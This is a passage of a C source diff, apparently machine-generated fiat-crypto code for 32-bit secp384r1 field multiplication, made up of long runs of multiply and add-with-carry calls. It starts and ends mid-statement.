x791, x838); ++ fiat_secp384r1_addcarryx_u32(&x865, &x866, x864, x793, x840); ++ fiat_secp384r1_addcarryx_u32(&x867, &x868, x866, x795, x842); ++ fiat_secp384r1_addcarryx_u32(&x869, &x870, x868, x797, x844); ++ fiat_secp384r1_addcarryx_u32(&x871, &x872, x870, x799, x846); ++ fiat_secp384r1_addcarryx_u32(&x873, &x874, x872, x801, x848); ++ fiat_secp384r1_addcarryx_u32(&x875, &x876, x874, x803, x850); ++ fiat_secp384r1_addcarryx_u32(&x877, &x878, x876, x805, x852); ++ fiat_secp384r1_addcarryx_u32(&x879, &x880, x878, x807, x854); ++ fiat_secp384r1_mulx_u32(&x881, &x882, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x883, &x884, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x885, &x886, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x887, &x888, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x889, &x890, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x891, &x892, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x893, &x894, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x895, &x896, x855, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x897, &x898, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x899, &x900, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x901, &x902, 0x0, x898, x895); ++ fiat_secp384r1_addcarryx_u32(&x903, &x904, x902, x896, x893); ++ fiat_secp384r1_addcarryx_u32(&x905, &x906, x904, x894, x891); ++ fiat_secp384r1_addcarryx_u32(&x907, &x908, x906, x892, x889); ++ fiat_secp384r1_addcarryx_u32(&x909, &x910, x908, x890, x887); ++ fiat_secp384r1_addcarryx_u32(&x911, &x912, x910, x888, x885); ++ fiat_secp384r1_addcarryx_u32(&x913, &x914, x912, x886, x883); ++ fiat_secp384r1_addcarryx_u32(&x915, &x916, x914, x884, x881); ++ x917 = (x916 + x882); ++ fiat_secp384r1_addcarryx_u32(&x918, &x919, 0x0, x855, x899); ++ fiat_secp384r1_addcarryx_u32(&x920, &x921, x919, x857, x900); ++ fiat_secp384r1_addcarryx_u32(&x922, &x923, x921, x859, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x924, &x925, x923, x861, x897); ++ fiat_secp384r1_addcarryx_u32(&x926, &x927, x925, x863, x901); ++ fiat_secp384r1_addcarryx_u32(&x928, &x929, x927, x865, x903); ++ fiat_secp384r1_addcarryx_u32(&x930, &x931, x929, x867, x905); ++ fiat_secp384r1_addcarryx_u32(&x932, &x933, x931, x869, x907); ++ fiat_secp384r1_addcarryx_u32(&x934, &x935, x933, x871, x909); ++ fiat_secp384r1_addcarryx_u32(&x936, &x937, x935, x873, x911); ++ fiat_secp384r1_addcarryx_u32(&x938, &x939, x937, x875, x913); ++ fiat_secp384r1_addcarryx_u32(&x940, &x941, x939, x877, x915); ++ fiat_secp384r1_addcarryx_u32(&x942, &x943, x941, x879, x917); ++ x944 = ((uint32_t)x943 + x880); ++ fiat_secp384r1_mulx_u32(&x945, &x946, x7, (arg2[11])); ++ fiat_secp384r1_mulx_u32(&x947, &x948, x7, (arg2[10])); ++ fiat_secp384r1_mulx_u32(&x949, &x950, x7, (arg2[9])); ++ fiat_secp384r1_mulx_u32(&x951, &x952, x7, (arg2[8])); ++ fiat_secp384r1_mulx_u32(&x953, &x954, x7, (arg2[7])); ++ fiat_secp384r1_mulx_u32(&x955, &x956, x7, (arg2[6])); ++ fiat_secp384r1_mulx_u32(&x957, &x958, x7, (arg2[5])); ++ fiat_secp384r1_mulx_u32(&x959, &x960, x7, (arg2[4])); ++ fiat_secp384r1_mulx_u32(&x961, &x962, x7, (arg2[3])); ++ fiat_secp384r1_mulx_u32(&x963, &x964, x7, (arg2[2])); ++ fiat_secp384r1_mulx_u32(&x965, &x966, x7, (arg2[1])); ++ fiat_secp384r1_mulx_u32(&x967, &x968, x7, (arg2[0])); ++ fiat_secp384r1_addcarryx_u32(&x969, &x970, 0x0, x968, x965); ++ fiat_secp384r1_addcarryx_u32(&x971, &x972, x970, x966, x963); ++ fiat_secp384r1_addcarryx_u32(&x973, &x974, x972, x964, x961); ++ fiat_secp384r1_addcarryx_u32(&x975, &x976, x974, x962, x959); ++ fiat_secp384r1_addcarryx_u32(&x977, &x978, x976, x960, x957); ++ fiat_secp384r1_addcarryx_u32(&x979, &x980, x978, x958, x955); ++ fiat_secp384r1_addcarryx_u32(&x981, &x982, x980, x956, x953); ++ fiat_secp384r1_addcarryx_u32(&x983, &x984, x982, x954, x951); ++ fiat_secp384r1_addcarryx_u32(&x985, &x986, x984, x952, x949); ++ fiat_secp384r1_addcarryx_u32(&x987, &x988, x986, x950, x947); ++ fiat_secp384r1_addcarryx_u32(&x989, &x990, x988, x948, x945); ++ x991 = (x990 + x946); ++ fiat_secp384r1_addcarryx_u32(&x992, &x993, 0x0, x920, x967); ++ fiat_secp384r1_addcarryx_u32(&x994, &x995, x993, x922, x969); ++ fiat_secp384r1_addcarryx_u32(&x996, &x997, x995, x924, x971); ++ fiat_secp384r1_addcarryx_u32(&x998, &x999, x997, x926, x973); ++ fiat_secp384r1_addcarryx_u32(&x1000, &x1001, x999, x928, x975); ++ fiat_secp384r1_addcarryx_u32(&x1002, &x1003, x1001, x930, x977); ++ fiat_secp384r1_addcarryx_u32(&x1004, &x1005, x1003, x932, x979); ++ fiat_secp384r1_addcarryx_u32(&x1006, &x1007, x1005, x934, x981); ++ fiat_secp384r1_addcarryx_u32(&x1008, &x1009, x1007, x936, x983); ++ fiat_secp384r1_addcarryx_u32(&x1010, &x1011, x1009, x938, x985); ++ fiat_secp384r1_addcarryx_u32(&x1012, &x1013, x1011, x940, x987); ++ fiat_secp384r1_addcarryx_u32(&x1014, &x1015, x1013, x942, x989); ++ fiat_secp384r1_addcarryx_u32(&x1016, &x1017, x1015, x944, x991); ++ fiat_secp384r1_mulx_u32(&x1018, &x1019, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1020, &x1021, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1022, &x1023, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1024, &x1025, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1026, &x1027, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1028, &x1029, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1030, &x1031, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1032, &x1033, x992, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x1034, &x1035, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1036, &x1037, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x1038, &x1039, 0x0, x1035, x1032); ++ fiat_secp384r1_addcarryx_u32(&x1040, &x1041, x1039, x1033, x1030); ++ fiat_secp384r1_addcarryx_u32(&x1042, &x1043, x1041, x1031, x1028); ++ fiat_secp384r1_addcarryx_u32(&x1044, &x1045, x1043, x1029, x1026); ++ fiat_secp384r1_addcarryx_u32(&x1046, &x1047, x1045, x1027, x1024); ++ fiat_secp384r1_addcarryx_u32(&x1048, &x1049, x1047, x1025, x1022); ++ fiat_secp384r1_addcarryx_u32(&x1050, &x1051, x1049, x1023, x1020); ++ fiat_secp384r1_addcarryx_u32(&x1052, &x1053, x1051, x1021, x1018); ++ x1054 = (x1053 + x1019); ++ fiat_secp384r1_addcarryx_u32(&x1055, &x1056, 0x0, x992, x1036); ++ fiat_secp384r1_addcarryx_u32(&x1057, &x1058, x1056, x994, x1037); ++ fiat_secp384r1_addcarryx_u32(&x1059, &x1060, x1058, x996, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x1061, &x1062, x1060, x998, x1034); ++ fiat_secp384r1_addcarryx_u32(&x1063, &x1064, x1062, x1000, x1038); ++ fiat_secp384r1_addcarryx_u32(&x1065, &x1066, x1064, x1002, x1040); ++ fiat_secp384r1_addcarryx_u32(&x1067, &x1068, x1066, x1004, x1042); ++ fiat_secp384r1_addcarryx_u32(&x1069, &x1070, x1068, x1006, x1044); ++ fiat_secp384r1_addcarryx_u32(&x1071, &x1072, x1070, x1008, x1046); ++ fiat_secp384r1_addcarryx_u32(&x1073, &x1074, x1072, x1010, x1048); ++ fiat_secp384r1_addcarryx_u32(&x1075, &x1076, x1074, x1012, x1050); ++ fiat_secp384r1_addcarryx_u32(&x1077, &x1078, x1076, x1014, x1052); ++ fiat_secp384r1_addcarryx_u32(&x1079, &x1080, x1078, x1016, x1054); ++ x1081 = ((uint32_t)x1080 + x1017); ++ fiat_secp384r1_mulx_u32(&x1082, &x1083, x8, (arg2[11])); ++ fiat_secp384r1_mulx_u32(&x1084, &x1085, x8, (arg2[10])); ++ fiat_secp384r1_mulx_u32(&x1086, &x1087, x8, (arg2[9])); ++ fiat_secp384r1_mulx_u32(&x1088, &x1089, x8, (arg2[8])); ++ fiat_secp384r1_mulx_u32(&x1090, &x1091, x8, (arg2[7])); ++ fiat_secp384r1_mulx_u32(&x1092, &x1093, x8, (arg2[6])); ++ fiat_secp384r1_mulx_u32(&x1094, &x1095, x8, (arg2[5])); ++ fiat_secp384r1_mulx_u32(&x1096, &x1097, x8, (arg2[4])); ++ fiat_secp384r1_mulx_u32(&x1098, &x1099, x8, (arg2[3])); ++ fiat_secp384r1_mulx_u32(&x1100, &x1101, x8, (arg2[2])); ++ fiat_secp384r1_mulx_u32(&x1102, &x1103, x8, (arg2[1])); ++ fiat_secp384r1_mulx_u32(&x1104, &x1105, x8, (arg2[0])); ++ fiat_secp384r1_addcarryx_u32(&x1106, &x1107, 0x0, x1105, x1102); ++ fiat_secp384r1_addcarryx_u32(&x1108, &x1109, x1107, x1103, x1100); ++ fiat_secp384r1_addcarryx_u32(&x1110, &x1111, x1109, x1101, x1098); ++ fiat_secp384r1_addcarryx_u32(&x1112, &x1113, x1111, x1099, x1096); ++ fiat_secp384r1_addcarryx_u32(&x1114, &x1115, x1113, x1097, x1094); ++ fiat_secp384r1_addcarryx_u32(&x1116, &x1117, x1115, x1095, x1092); ++ fiat_secp384r1_addcarryx_u32(&x1118, &x1119, x1117, x1093, x1090); ++ fiat_secp384r1_addcarryx_u32(&x1120, &x1121, x1119, x1091, x1088); ++ fiat_secp384r1_addcarryx_u32(&x1122, &x1123, x1121, x1089, x1086); ++ fiat_secp384r1_addcarryx_u32(&x1124, &x1125, x1123, x1087, x1084); ++ fiat_secp384r1_addcarryx_u32(&x1126, &x1127, x1125, x1085, x1082); ++ x1128 = (x1127 + x1083); ++ fiat_secp384r1_addcarryx_u32(&x1129, &x1130, 0x0, x1057, x1104); ++ fiat_secp384r1_addcarryx_u32(&x1131, &x1132, x1130, x1059, x1106); ++ fiat_secp384r1_addcarryx_u32(&x1133, &x1134, x1132, x1061, x1108); ++ fiat_secp384r1_addcarryx_u32(&x1135, &x1136, x1134, x1063, x1110); ++ fiat_secp384r1_addcarryx_u32(&x1137, &x1138, x1136, x1065, x1112); ++ fiat_secp384r1_addcarryx_u32(&x1139, &x1140, x1138, x1067, x1114); ++ fiat_secp384r1_addcarryx_u32(&x1141, &x1142, x1140, x1069, x1116); ++ fiat_secp384r1_addcarryx_u32(&x1143, &x1144, x1142, x1071, x1118); ++ fiat_secp384r1_addcarryx_u32(&x1145, &x1146, x1144, x1073, x1120); ++ fiat_secp384r1_addcarryx_u32(&x1147, &x1148, x1146, x1075, x1122); ++ fiat_secp384r1_addcarryx_u32(&x1149, &x1150, x1148, x1077, x1124); ++ fiat_secp384r1_addcarryx_u32(&x1151, &x1152, x1150, x1079, x1126); ++ fiat_secp384r1_addcarryx_u32(&x1153, &x1154, x1152, x1081, x1128); ++ fiat_secp384r1_mulx_u32(&x1155, &x1156, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1157, &x1158, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1159, &x1160, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1161, &x1162, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1163, &x1164, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1165, &x1166, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1167, &x1168, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1169, &x1170, x1129, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x1171, &x1172, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1173, &x1174, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x1175, &x1176, 0x0, x1172, x1169); ++ fiat_secp384r1_addcarryx_u32(&x1177, &x1178, x1176, x1170, x1167); ++ fiat_secp384r1_addcarryx_u32(&x1179, &x1180, x1178, x1168, x1165); ++ fiat_secp384r1_addcarryx_u32(&x1181, &x1182, x1180, x1166, x1163); ++ fiat_secp384r1_addcarryx_u32(&x1183, &x1184, x1182, x1164, x1161); ++ fiat_secp384r1_addcarryx_u32(&x1185, &x1186, x1184, x1162, x1159); ++ fiat_secp384r1_addcarryx_u32(&x1187, &x1188, x1186, x1160, x1157); ++ fiat_secp384r1_addcarryx_u32(&x1189, &x1190, x1188, x1158, x1155); ++ x1191 = (x1190 + x1156); ++ fiat_secp384r1_addcarryx_u32(&x1192, &x1193, 0x0, x1129, x1173); ++ fiat_secp384r1_addcarryx_u32(&x1194, &x1195, x1193, x1131, x1174); ++ fiat_secp384r1_addcarryx_u32(&x1196, &x1197, x1195, x1133, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x1198, &x1199, x1197, x1135, x1171); ++ fiat_secp384r1_addcarryx_u32(&x1200, &x1201, x1199, x1137, x1175); ++ fiat_secp384r1_addcarryx_u32(&x1202, &x1203, x1201, x1139, x1177); ++ fiat_secp384r1_addcarryx_u32(&x1204, &x1205, x1203, x1141, x1179); ++ fiat_secp384r1_addcarryx_u32(&x1206, &x1207, x1205, x1143, x1181); ++ fiat_secp384r1_addcarryx_u32(&x1208, &x1209, x1207, x1145, x1183); ++ fiat_secp384r1_addcarryx_u32(&x1210, &x1211, x1209, x1147, x1185); ++ fiat_secp384r1_addcarryx_u32(&x1212, &x1213, x1211, x1149, x1187); ++ fiat_secp384r1_addcarryx_u32(&x1214, &x1215, x1213, x1151, x1189); ++ fiat_secp384r1_addcarryx_u32(&x1216, &x1217, x1215, x1153, x1191); ++ x1218 = ((uint32_t)x1217 + x1154); ++ fiat_secp384r1_mulx_u32(&x1219, &x1220, x9, (arg2[11])); ++ fiat_secp384r1_mulx_u32(&x1221, &x1222, x9, (arg2[10])); ++ fiat_secp384r1_mulx_u32(&x1223, &x1224, x9, (arg2[9])); ++ fiat_secp384r1_mulx_u32(&x1225, &x1226, x9, (arg2[8])); ++ fiat_secp384r1_mulx_u32(&x1227, &x1228, x9, (arg2[7])); ++ fiat_secp384r1_mulx_u32(&x1229, &x1230, x9, (arg2[6])); ++ fiat_secp384r1_mulx_u32(&x1231, &x1232, x9, (arg2[5])); ++ fiat_secp384r1_mulx_u32(&x1233, &x1234, x9, (arg2[4])); ++ fiat_secp384r1_mulx_u32(&x1235, &x1236, x9, (arg2[3])); ++ fiat_secp384r1_mulx_u32(&x1237, &x1238, x9, (arg2[2])); ++ fiat_secp384r1_mulx_u32(&x1239, &x1240, x9, (arg2[1])); ++ fiat_secp384r1_mulx_u32(&x1241, &x1242, x9, (arg2[0])); ++ fiat_secp384r1_addcarryx_u32(&x1243, &x1244, 0x0, x1242, x1239); ++ fiat_secp384r1_addcarryx_u32(&x1245, &x1246, x1244, x1240, x1237); ++ fiat_secp384r1_addcarryx_u32(&x1247, &x1248, x1246, x1238, x1235); ++ fiat_secp384r1_addcarryx_u32(&x1249, &x1250, x1248, x1236, x1233); ++ fiat_secp384r1_addcarryx_u32(&x1251, &x1252, x1250, x1234, x1231); ++ fiat_secp384r1_addcarryx_u32(&x1253, &x1254, x1252, x1232, x1229); ++ fiat_secp384r1_addcarryx_u32(&x1255, &x1256, x1254, x1230, x1227); ++ fiat_secp384r1_addcarryx_u32(&x1257, &x1258, x1256, x1228, x1225); ++ fiat_secp384r1_addcarryx_u32(&x1259, &x1260, x1258, x1226, x1223); ++ fiat_secp384r1_addcarryx_u32(&x1261, &x1262, x1260, x1224, x1221); ++ fiat_secp384r1_addcarryx_u32(&x1263, &x1264, x1262, x1222, x1219); ++ x1265 = (x1264 + x1220); ++ fiat_secp384r1_addcarryx_u32(&x1266, &x1267, 0x0, x1194, x1241); ++ fiat_secp384r1_addcarryx_u32(&x1268, &x1269, x1267, x1196, x1243); ++ fiat_secp384r1_addcarryx_u32(&x1270, &x1271, x1269, x1198, x1245); ++ fiat_secp384r1_addcarryx_u32(&x1272, &x1273, x1271, x1200, x1247); ++ fiat_secp384r1_addcarryx_u32(&x1274, &x1275, x1273, x1202, x1249); ++ fiat_secp384r1_addcarryx_u32(&x1276, &x1277, x1275, x1204, x1251); ++ fiat_secp384r1_addcarryx_u32(&x1278, &x1279, x1277, x1206, x1253); ++ fiat_secp384r1_addcarryx_u32(&x1280, &x1281, x1279, x1208, x1255); ++ fiat_secp384r1_addcarryx_u32(&x1282, &x1283, x1281, x1210, x1257); ++ fiat_secp384r1_addcarryx_u32(&x1284, &x1285, x1283, x1212, x1259); ++ fiat_secp384r1_addcarryx_u32(&x1286, &x1287, x1285, x1214, x1261); ++ fiat_secp384r1_addcarryx_u32(&x1288, &x1289, x1287, x1216, x1263); ++ fiat_secp384r1_addcarryx_u32(&x1290, &x1291, x1289, x1218, x1265); ++ fiat_secp384r1_mulx_u32(&x1292, &x1293, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1294, &x1295, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1296, &x1297, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1298, &x1299, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1300, &x1301, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1302, &x1303, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1304, &x1305, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1306, &x1307, x1266, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x1308, &x1309, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1310, &x1311, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x1312, &x1313, 0x0, x1309, x1306); ++ fiat_secp384r1_addcarryx_u32(&x1314, &x1315, x1313, x1307, x1304); ++ fiat_secp384r1_addcarryx_u32(&x1316, &x1317, x1315, x1305, x1302); ++ fiat_secp384r1_addcarryx_u32(&x1318, &x1319, x1317, x1303, x1300); ++ fiat_secp384r1_addcarryx_u32(&x1320, &x1321, x1319, x1301, x1298); ++ fiat_secp384r1_addcarryx_u32(&x1322, &x1323, x1321, x1299, x1296); ++ fiat_secp384r1_addcarryx_u32(&x1324, &x1325, x1323, x1297, x1294); ++ fiat_secp384r1_addcarryx_u32(&x1326, &x1327, x1325, x1295, x1292); ++ x1328 = (x1327 + x1293); ++ fiat_secp384r1_addcarryx_u32(&x1329, &x1330, 0x0, x1266, x1310); ++ fiat_secp384r1_addcarryx_u32(&x1331, &x1332, x1330, x1268, x1311); ++ fiat_secp384r1_addcarryx_u32(&x1333, &x1334, x1332, x1270, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x1335, &x1336, x1334, x1272, x1308); ++ fiat_secp384r1_addcarryx_u32(&x1337, &x1338, x1336, x1274, x1312); ++ fiat_secp384r1_addcarryx_u32(&x1339, &x1340, x1338, x1276, x1314); ++ fiat_secp384r1_addcarryx_u32(&x1341, &x1342, x1340, x1278, x1316); ++ fiat_secp384r1_addcarryx_u32(&x1343, &x1344, x1342, x1280, x1318); ++ fiat_secp384r1_addcarryx_u32(&x1345, &x1346, x1344, x1282, x1320); ++ fiat_secp384r1_addcarryx_u32(&x1347, &x1348, x1346, x1284, x1322); ++ fiat_secp384r1_addcarryx_u32(&x1349, &x1350, x1348, x1286, x1324); ++ fiat_secp384r1_addcarryx_u32(&x1351, &x1352, x1350, x1288, x1326); ++ fiat_secp384r1_addcarryx_u32(&x1353, &x1354, x1352, x1290, x1328); ++ x1355 = ((uint32_t)x1354 + x1291); ++ fiat_secp384r1_mulx_u32(&x1356, &x1357, x10, (arg2[11])); ++ fiat_secp384r1_mulx_u32(&x1358, &x1359, x10, (arg2[10])); ++ fiat_secp384r1_mulx_u32(&x1360, &x1361, x10, (arg2[9])); ++ fiat_secp384r1_mulx_u32(&x1362, &x1363, x10, (arg2[8])); ++ fiat_secp384r1_mulx_u32(&x1364, &x1365, x10, (arg2[7])); ++ fiat_secp384r1_mulx_u32(&x1366, &x1367, x10, (arg2[6])); ++ fiat_secp384r1_mulx_u32(&x1368, &x1369, x10, (arg2[5])); ++ fiat_secp384r1_mulx_u32(&x1370, &x1371, x10, (arg2[4])); ++ fiat_secp384r1_mulx_u32(&x1372, &x1373, x10, (arg2[3])); ++ fiat_secp384r1_mulx_u32(&x1374, &x1375, x10, (arg2[2])); ++ fiat_secp384r1_mulx_u32(&x1376, &x1377, x10, (arg2[1])); ++ fiat_secp384r1_mulx_u32(&x1378, &x1379, x10, (arg2[0])); ++ fiat_secp384r1_addcarryx_u32(&x1380, &x1381, 0x0, x1379, x1376); ++ fiat_secp384r1_addcarryx_u32(&x1382, &x1383, x1381, x1377, x1374); ++ fiat_secp384r1_addcarryx_u32(&x1384, &x1385, x1383, x1375, x1372); ++ fiat_secp384r1_addcarryx_u32(&x1386, &x1387, x1385, x1373, x1370); ++ fiat_secp384r1_addcarryx_u32(&x1388, &x1389, x1387, x1371, x1368); ++ fiat_secp384r1_addcarryx_u32(&x1390, &x1391, x1389, x1369, x1366); ++ fiat_secp384r1_addcarryx_u32(&x1392, &x1393, x1391, x1367, x1364); ++ fiat_secp384r1_addcarryx_u32(&x1394, &x1395, x1393, x1365, x1362); ++ fiat_secp384r1_addcarryx_u32(&x1396, &x1397, x1395, x1363, x1360); ++ fiat_secp384r1_addcarryx_u32(&x1398, &x1399, x1397, x1361, x1358); ++ fiat_secp384r1_addcarryx_u32(&x1400, &x1401, x1399, x1359, x1356); ++ x1402 = (x1401 + x1357); ++ fiat_secp384r1_addcarryx_u32(&x1403, &x1404, 0x0, x1331, x1378); ++ fiat_secp384r1_addcarryx_u32(&x1405, &x1406, x1404, x1333, x1380); ++ fiat_secp384r1_addcarryx_u32(&x1407, &x1408, x1406, x1335, x1382); ++ fiat_secp384r1_addcarryx_u32(&x1409, &x1410, x1408, x1337, x1384); ++ fiat_secp384r1_addcarryx_u32(&x1411, &x1412, x1410, x1339, x1386); ++ fiat_secp384r1_addcarryx_u32(&x1413, &x1414, x1412, x1341, x1388); ++ fiat_secp384r1_addcarryx_u32(&x1415, &x1416, x1414, x1343, x1390); ++ fiat_secp384r1_addcarryx_u32(&x1417, &x1418, x1416, x1345, x1392); ++ fiat_secp384r1_addcarryx_u32(&x1419, &x1420, x1418, x1347, x1394); ++ fiat_secp384r1_addcarryx_u32(&x1421, &x1422, x1420, x1349, x1396); ++ fiat_secp384r1_addcarryx_u32(&x1423, &x1424, x1422, x1351, x1398); ++ fiat_secp384r1_addcarryx_u32(&x1425, &x1426, x1424, x1353, x1400); ++ fiat_secp384r1_addcarryx_u32(&x1427, &x1428, x1426, x1355, x1402); ++ fiat_secp384r1_mulx_u32(&x1429, &x1430, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1431, &x1432, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1433, &x1434, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1435, &x1436, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1437, &x1438, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1439, &x1440, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1441, &x1442, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1443, &x1444, x1403, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x1445, &x1446, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1447, &x1448, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x1449, &x1450, 0x0, x1446, x1443); ++ fiat_secp384r1_addcarryx_u32(&x1451, &x1452, x1450, x1444, x1441); ++ fiat_secp384r1_addcarryx_u32(&x1453, &x1454, x1452, x1442, x1439); ++ fiat_secp384r1_addcarryx_u32(&x1455, &x1456, x1454, x1440, x1437); ++ fiat_secp384r1_addcarryx_u32(&x1457, &x1458, x1456, x1438, x1435); ++ fiat_secp384r1_addcarryx_u32(&x1459, &x1460, x1458, x1436, x1433); ++ fiat_secp384r1_addcarryx_u32(&x1461, &x1462, x1460, x1434, x1431); ++ fiat_secp384r1_addcarryx_u32(&x1463, &x1464, x1462, x1432, x1429); ++ x1465 = (x1464 + x1430); ++ fiat_secp384r1_addcarryx_u32(&x1466, &x1467, 0x0, x1403, x1447); ++ fiat_secp384r1_addcarryx_u32(&x1468, &x1469, x1467, x1405, x1448); ++ fiat_secp384r1_addcarryx_u32(&x1470, &x1471, x1469, x1407, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x1472, &x1473, x1471, x1409, x1445); ++ fiat_secp384r1_addcarryx_u32(&x1474, &x1475, x1473, x1411, x1449); ++ fiat_secp384r1_addcarryx_u32(&x1476, &x1477, x1475, x1413, x1451); ++ fiat_secp384r1_addcarryx_u32(&x1478, &x1479, x1477, x1415, x1453); ++ fiat_secp384r1_addcarryx_u32(&x1480, &x1481, x1479, x1417, x1455); ++ fiat_secp384r1_addcarryx_u32(&x1482, &x1483, x1481, x1419, x1457); ++ fiat_secp384r1_addcarryx_u32(&x1484, &x1485, x1483, x1421, x1459); ++ fiat_secp384r1_addcarryx_u32(&x1486, &x1487, x1485, x1423, x1461); ++ fiat_secp384r1_addcarryx_u32(&x1488, &x1489, x1487, x1425, x1463); ++ fiat_secp384r1_addcarryx_u32(&x1490, &x1491, x1489, x1427, x1465); ++ x1492 = ((uint32_t)x1491 + x1428); ++ fiat_secp384r1_mulx_u32(&x1493, &x1494, x11, (arg2[11])); ++ fiat_secp384r1_mulx_u32(&x1495, &x1496, x11, (arg2[10])); ++ fiat_secp384r1_mulx_u32(&x1497, &x1498, x11, (arg2[9])); ++ fiat_secp384r1_mulx_u32(&x1499, &x1500, x11, (arg2[8])); ++ fiat_secp384r1_mulx_u32(&x1501, &x1502, x11, (arg2[7])); ++ fiat_secp384r1_mulx_u32(&x1503, &x1504, x11, (arg2[6])); ++ fiat_secp384r1_mulx_u32(&x1505, &x1506, x11, (arg2[5])); ++ fiat_secp384r1_mulx_u32(&x1507, &x1508, x11, (arg2[4])); ++ fiat_secp384r1_mulx_u32(&x1509, &x1510, x11, (arg2[3])); ++ fiat_secp384r1_mulx_u32(&x1511, &x1512, x11, (arg2[2])); ++ fiat_secp384r1_mulx_u32(&x1513, &x1514, x11, (arg2[1])); ++ fiat_secp384r1_mulx_u32(&x1515, &x1516, x11, (arg2[0])); ++ fiat_secp384r1_addcarryx_u32(&x1517, &x1518, 0x0, x1516, x1513); ++ fiat_secp384r1_addcarryx_u32(&x1519, &x1520, x1518, x1514, x1511); ++ fiat_secp384r1_addcarryx_u32(&x1521, &x1522, x1520, x1512, x1509); ++ fiat_secp384r1_addcarryx_u32(&x1523, &x1524, x1522, x1510, x1507); ++ fiat_secp384r1_addcarryx_u32(&x1525, &x1526, x1524, x1508, x1505); ++ fiat_secp384r1_addcarryx_u32(&x1527, &x1528, x1526, x1506, x1503); ++ fiat_secp384r1_addcarryx_u32(&x1529, &x1530, x1528, x1504, x1501); ++ fiat_secp384r1_addcarryx_u32(&x1531, &x1532, x1530, x1502, x1499); ++ fiat_secp384r1_addcarryx_u32(&x1533, &x1534, x1532, x1500, x1497); ++ fiat_secp384r1_addcarryx_u32(&x1535, &x1536, x1534, x1498, x1495); ++ fiat_secp384r1_addcarryx_u32(&x1537, &x1538, x1536, x1496, x1493); ++ x1539 = (x1538 + x1494); ++ fiat_secp384r1_addcarryx_u32(&x1540, &x1541, 0x0, x1468, x1515); ++ fiat_secp384r1_addcarryx_u32(&x1542, &x1543, x1541, x1470, x1517); ++ fiat_secp384r1_addcarryx_u32(&x1544, &x1545, x1543, x1472, x1519); ++ fiat_secp384r1_addcarryx_u32(&x1546, &x1547, x1545, x1474, x1521); ++ fiat_secp384r1_addcarryx_u32(&x1548, &x1549, x1547, x1476, x1523); ++ fiat_secp384r1_addcarryx_u32(&x1550, &x1551, x1549, x1478, x1525); ++ fiat_secp384r1_addcarryx_u32(&x1552, &x1553, x1551, x1480, x1527); ++ fiat_secp384r1_addcarryx_u32(&x1554, &x1555, x1553, x1482, x1529); ++ fiat_secp384r1_addcarryx_u32(&x1556, 